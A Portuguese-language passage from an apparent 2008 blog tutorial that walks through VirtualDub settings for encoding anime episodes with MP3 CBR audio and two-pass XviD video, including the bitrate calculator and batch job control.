Clique em Áudio e se a opção Full Processing Mode não estiver marcada, faça-a agora. Depois de marcada a opção, irá habilitar outras opções. Vamos utilizar apenas a opção Compression... Clique na opção Compression... e escolha na lista que irá aparecer a opção Lame MP3. Na janelinha ao lado haverá muitas configurações de MP3. Para um anime comum, utilizaremos como áudio o .mp3 48000 Hz 128 Kbps CBR stereo. Lembre-se de se certificar que escolherá o áudio correto. Certifique-se também de escolher o .mp3 CBR. Nunca escolha o ABR. Depois de selecionado na lista, clique em OK. Abra novamente o a janela Compression... só para se certificar de ter escolhido o áudio correto. Depois disso vem a configuração do vídeo.

Clique em Vídeo e se a opção Full Processing Mode não estiver marcada, faça-a agora. Depois de marcada a opção, irá habilitar outras opções. Vamos utilizar apenas a opção Compression... Clique na opção Compression... e selecione na lista que irá aparecer a opção XviD MPEG-4 Codec. Depois de selecionar, clique em Configure. Essa é a parte mais complicada. Em Profile @ Level:, clique em more... Na aba Profile marque Adaptive Quantization e B-VOPS. Dê OK. Agora clique em Advanced Options... e marque Use Chroma Motion, Turbo e Cartoon Mode. Dê um OK. Em Zone Options marque Chroma Optimizer enabled. Depois de configuradas essas opções escolha em Encoding Type a opção Twopass – 1st pass. Dê um OK e novamente dê outro OK. Estamos prontos para encodar à primeira parte do vídeo, que é primeiro as informações sobre o vídeo. Essa etapa irá criar dois arquivos: um arquivo denominado vídeo.pass e outro com o nome que você irá escolher. Depois dessa etapa que iria vir a segunda e ultima etapa, que é onde se cria o vídeo. Mas como estou escrevendo esse tutorial hoje, irei dar uma manha para vocês. Se eu tivesse escrito esse tutorial a umas duas semanas atrás, íamos ter que esperar o 1st pass para depois configurar o 2nd pass. Mas com a manha que aprendi vai ser fácil. O processo de encoding dura mais ou menos uma hora e meia, dependendo da máquina. Vamos começar a configurar o encode. Depois de ter escolhido o Twopass – 1st pass e clicado em OK, vá em File e clique em Save as AVI... Lá dê um nome para o arquivo e bem em baixo marque a opção denominada de Don’t run this job now; add it to job control so I can run it in batch mode. Agora clique em Salvar. Agora refaça todo o caminho de se configurar o XviD (Vídeo > Compression > XviD MPEG-4 Codec > Configure) e troque a opção Encoding Type de Twopass – 1st pass para Twopass – 2nd pass. Vai habilitar uma opção bem abaixo. É a calculadora bitrate do codec XviD. Com ela seremos capazes de personalizar o encode, calculando o tamanho do arquivo no final. Bem ao lado tem Calc... clique nessa opção. Quando aparecer a janela da calculadora, a primeira opção denominada Target Size é onde se coloca o tamanho que se deseja obter. Lembre-se que esse valor tem que estar em Kb, ou seja, se se deseja obter um episódio de 175 MB, devemos por nessa opção algo em torno de 178000. Coloque também o tempo de duração do episódio na área delimitada chamada Vídeo. A área delimitada chamada Áudio vai depender da configuração do codec de áudio. Como acredito que você seguiu esse tutorial todo, então a opção Format será MP3-CBR e nas caixas de seleção marque Average Bitrate e escolha 128. Clique em OK, depois OK e agora OK novamente. Refaça o mesmo procedimento anterior (File > Save as AVI) dê um nome pro arquivo que não seja o mesmo nome do 1st pass, marque a opçõa lá em baixo Don’t run this job now; add it to job control so I can run it in batch mode e clique em Salvar. Agora vá em File > Job Control ou simplesmente aperte F4 e lá selecione o processo de encoding do 1st pass e clique em Start. Sua maquina começou a encodar. É bom que você feche todos os programas para obter um aproveitamento maximo do encode. Espere até o tempo acabar e assista para ver se está tudo ok. Se não estiver, releia o tutorial e veja o que aconteceu de errado. Se persistir o problema me procure.

Tutorial de mirc completaço feito por Soujiro_Seta & Capitao-Caverna

2008-05-20T05:51:00.000-07:00